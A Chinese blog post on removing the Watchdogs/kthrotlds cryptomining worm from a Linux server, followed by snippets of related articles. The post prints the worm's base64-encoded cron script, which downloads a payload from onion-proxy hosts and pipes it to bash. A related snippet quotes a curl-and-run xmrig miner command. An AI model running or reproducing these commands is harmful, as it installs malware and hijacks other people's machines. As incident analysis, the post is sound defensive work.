解决Watchdogs 、kthrotlds 挖矿蠕虫

最新推荐文章于 2024-04-11 14:19:11 发布
最新推荐文章于 2024-04-11 14:19:11 发布
阅读量1k 收藏
点赞数
分类专栏: linux 文章标签: Watchdogs 、kthrotlds 挖矿蠕虫
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010576019/article/details/101349364
版权

在最近开发项目部署过程中,发现项目运行缓慢,人员数过多情况下系统卡死。
查看服务器,top命令发现服务器中毒
中毒了crontab -l 命令后发现也存在定时调度,打开定时调度文件/root/.systemd-init
发现文件为base64编码,我靠。文件如下:
#!/bin/bash
exec &>/dev/null
sleep 119
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdSgpIHsKeD0vY3JuCndnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgJDEkeCB8fCBjdXJsIC1tMTgwIC1mc1NMa0EtICQxJHgKfQppZiAhIGxzIC9wcm9jLyQoY2F0IC90bXAvLlgxMS11bml4LzApL2lvOyB0aGVuCigKdSBpbnRlbGJhZ2pvcDduem01LnRvcjJ3ZWIuaW8gfHwKdSBpbnRlbGJhZ2pvcDduem01LmQyd2ViLm9yZyB8fAp1IGludGVsYmFnam9wN256bTUub25pb24uaW4ubmV0IHx8CnUgaW50ZWxiYWdqb3A3bnptNS5vbmlvbi5nbGFzcyB8fAp1IGludGVsYmFnam9wN256bTUub25pb24ubW4gfHwKdSBpbnRlbGJhZ2pvcDduem01Lm9uaW9uLnNoIHx8CnUgaW50ZWxiYWdqb3A3bnptNS5vbmlvbi50bwopfGJhc2gKZmkK|base64 -d|bash
不要紧,解码看看源码
解码定时文件意思明确,查找文件是否存在,不存在就下载一堆东西到/tmp下面。对于菜鸟的我,直接kill 病毒进程,直接删掉/tmp下的所有内容.crontab -r 删掉定时调度,删掉这个定时文件/root/.systemd-init。但是跟踪了一下,20分钟后又给启动了。
ps -ef 病毒进程,看不到病毒文件所在位置,很困惑,怀疑病毒劫持了ps命令。
折腾很久,百度一下发现这是2019年2月爆发的Watchdogs 、kthrotlds 挖矿蠕虫
git上给出如下解决方案,终于搞定,两个脚本完成,如果在执行脚本中发现不能执行的问题,请用chattr -i 不能执行的文件。
https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool

u010576019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kthrotlds kill.zip
05-14
将busybox放在/bin下,运行clear,转载于某大神
WatchDogs-Hack
07-06
WatchDogs-Hack》项目是一个利用C++和MASM64汇编语言进行编程的黑客工具,旨在模拟游戏《看门狗》中的黑客技术。这个项目由两个主要部分组成,一部分是基于D3D(Direct3D)的基础框架,这部分可能涉及到图形渲染和...
linux服务器排查挖矿病毒kthroltlds的经过
elvismelody的博客
05-15 4789
服务器报病毒 查了种种资料,原来ThinkPHP和Supervisord和Nexus Repository Manager 3的产品旧版本有漏洞, 我就是装了maven nexus 3, 有漏洞被入侵了,这是变种病毒:kthroltlds 看看top任务栏有哪些可疑的地方: ps-aux--sort=-pcpu|head-10 得到: python2直接ex...
【安全】查杀linux挖矿病毒 kswapd0
最新发布
飞的博客
04-11 1764
按照腾讯云报道,此次攻击为“亡命徒(Outlaw)僵尸网络”该僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。高cpu占用,使用top命令查看cpu使用率长时间50%以上,cpu占用异常的进程八成就是挖矿病毒进程。此病毒隐藏了自己,top命令无法查看到挖矿病毒进程,可通过sysdig命令找到隐藏进程。注意,该进程有子进程spamd child,需要一同清理,否则会再次重启。同时检查如下目录,将可疑文件清理掉。
Redis数据库未授权访问及安全组漏洞kthrotlds挖矿
Jan_My31的博客
05-27 566
打开电脑,打开navicat,查看昨天的数据,给我来这么一下,已经不止一次给我要比特币。数据不值钱,但是你已经搞过我两次啦。 To recover your lost Database and avoid leaking it: Send us 0.05 Bitcoin (BTC) to our Bitcoin address 38J6T4h6FozuBQTPrhdwoTHgQf5arK4jRj ...
记录一次watchdog挖矿
buzenmedi的专栏
06-29 630
突然发现机器cpu很高,一看cpu飙到60% 查了一下进程发现可疑的进程,给干掉了,cpu恢复正常 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxf
如何更有效的消灭watchdogs挖矿病毒?华为云DCS Redis为您支招
weixin_34319999的博客
02-27 267
2019独角兽企业重金招聘Python工程师标准>>> ...
watchdogs:关注网络世界的变化,一切都可以RSS
05-30
通过pip顺利部署: pip install -U watchdogs;python3 -m watchdogs 使用 Web UI 轻松创建新的爬虫,而不是像编写重复代码的旧方法。 所有的爬虫都在异步环境中运行。 几乎所有元素都有一个title属性来描述 Web UI ...
Python库 | watchdogs-1.6.9-py3-none-any.whl
03-25
`watchdogs-1.6.9-py3-none-any.whl` 是一个针对 Python 开发的库,名为 `watchdogs` 的版本 1.6.9。这个文件是一种特殊格式的归档,用于分发和安装 Python 包,称为 wheel 文件。在 Python 的生态系统中,wheel ...
Python库 | watchdogs-1.8.7-py3-none-any.whl
05-11
资源分类:Python库 所属语言:Python 资源全名:watchdogs-1.8.7-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | watchdogs-1.8.4-py3-none-any.whl
05-11
资源分类:Python库 所属语言:Python 资源全名:watchdogs-1.8.4-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
应急响应-挖矿病毒(kswapd0)
weixin_45690589的博客
10-10 1110
应急响应-挖矿病毒(kswapd0)
centos kswapd0 挖矿木马病毒进程CPU100解决
1193379199的博客
01-20 1006
很多病毒都是有会在定时任务里面,以至于很难清理清楚。(由于我的服务器买油开启定时任务服务,所以里面没有任务)2.1 执行命令netstat -antlp | grep kswapd0 查询该进程的网络信息。主要是由于kswapd0进程在作怪,占据了99%以上的CUP,查找资料后,发现它就是挖矿进程。最好把木马程序和定时任务都清理完了再杀掉,要不然还会自动重启。1.在系统里面top一下,查看了所有进程。2.排查kswapd0进程。7.杀掉kswapd0进程。4.查看进程的工作空间。
【Linux系统恶意代码】“亡命徒(Outlaw)僵尸网络” Kswapd0挖矿病毒的发现与清除
AGATHA_66的博客
01-11 1723
系统被SSH暴力破解后,攻击者会在系统目录下添加.configrc5文件夹,文件结构内容如下,名为“a”的文件夹下存放开源门罗币挖矿程序kswapd0(xmrig)和启动脚本,名为“b”的文件夹下存放后门程序run和执行脚本。执行stop脚本,睡眠10秒,列出当前工作的路径并输出到dir.dir的文件中,执行kswapd0挖矿程序,把最后运行的后台进程的PID写入到一个.pid文件中。
kswapd0 config.json 入侵解决方案
zhong8888888800的博客
02-21 155
Linux 入侵类问题排查思路 https://cloud.tencent.com/document/product/296/9604 https://blog.csdn.net/moshi_monian/article/details/107202560?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161880217316780271533202%2522%252C%2522scm%2522%253A%252220140713.130
kswapd0 是系统的虚拟内存管理程序,也可能是伪装的挖矿病毒
255.255.255.0
03-29 2333
1.kswapd0 是系统的虚拟内存管理程序,如果物理内存不够用,系统就会唤醒 kswapd0 进程,由 kswapd0 分配磁盘交换空间作缓存,因而占用大量的 CPU 资源。 2.也有挖矿病毒伪装成相同名称,挖矿注意排查 ......
解决virus.vbs.wiritebin.a和Virus.Win32.Ramin.x病毒
热门推荐
sanqima的专栏
07-13 1万+
virus.vbs.writebin.a是一种VB脚本木马病毒,该病毒会在电脑磁盘上篡改html、exe、dll这3种文件;Virus.Win32.Ramin.x也是一种木马病毒,它主要感人exe、dll这2中文件。 ...
redis通过6379端口无法连接服务器
波风水门
10-17 1万+
看了网上很多解决方案,都是端口问题,将127.0.0.1改为0.0.0.0,就ok了,但是本人的问题不是端口问题,端口本来就是0.0.0.0。 其实redis无法连接数据库就只有这几种可能,防火墙,安全组,密码,绑定IP。这次的问题感觉还是比较让人费解的,当更换端口号的时候就可以,默认端口6379就是不行。 按照顺序依次检查了防火墙,安全组,密码,配置文件,都确认没有问题之后,再次启动redis,...
清除Linux挖矿病毒
三少
03-21 1968
今天上服务器发现特别卡,有点奇怪,也没安装什么软件,况且昨天还是好好的。 top一下,不看不知道,一看吓一跳,有几个莫名的进程,CPU达到了200%。 查了下资料,才发现是被人利用挖矿了。 不过不要急,先把相关进程kill掉 然后进/etc里面查看相关文件 大概就是networkservice,sysupdate,sysupdates,config.json,sysguard这几个 注意,先用c...
怎么使用看门狗对多个任务进行监测
06-03
您可以使用多个看门狗实例来监视多个任务。每个看门狗实例都应该有自己的名称和超时时间。您可以使用一个循环来定期检查每个任务的状态,并在任务超时时重新启动它们。以下是一个示例代码片段,用于同时监视两个任务: ```python import threading import time from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler class WatchdogHandler(FileSystemEventHandler): def __init__(self, task_name, timeout): self.task_name = task_name self.timeout = timeout self.last_seen = time.time() def on_any_event(self, event): self.last_seen = time.time() def task1(): # Task 1 code here pass def task2(): # Task 2 code here pass if __name__ == '__main__': watchdogs = [ WatchdogHandler('Task 1', 60), WatchdogHandler('Task 2', 120) ] observers = [ Observer(), Observer() ] observers[0].schedule(watchdogs[0], path='.', recursive=True) observers[1].schedule(watchdogs[1], path='.', recursive=True) observers[0].start() observers[1].start() while True: for i, watchdog in enumerate(watchdogs): if time.time() - watchdog.last_seen > watchdog.timeout: observers[i].stop() observers[i].join() observers[i] = Observer() observers[i].schedule(watchdog, path='.', recursive=True) observers[i].start() time.sleep(1) ``` 这里我们创建了两个看门狗实例,一个用于监视任务1,另一个用于监视任务2。每个看门狗实例都有自己的超时时间。在主循环中,我们定期检查每个看门狗的最后一次看到的时间,如果超过超时时间,我们就重新启动相应的任务。请注意,这只是一个简单的示例代码片段,您可能需要根据自己的需求进行修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值